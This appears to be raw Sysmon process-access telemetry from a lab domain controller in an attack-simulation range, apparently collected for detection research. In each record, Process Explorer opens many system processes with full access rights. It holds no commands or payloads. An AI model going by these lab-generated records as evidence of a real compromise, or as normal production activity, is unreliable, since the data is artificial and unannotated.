15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792788Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792787Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792786Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792785Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792784Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792783Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792782Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792781Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792780Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792779Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792778Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792777Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792776Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792775Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792774Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792773Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792772Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792771Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792770Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792769Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792768Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792767Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792766Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792765Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792764Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792763Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792762Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792761Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792760Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792759Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792758Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792757Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792756Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792755Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792754Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792753Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792752Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 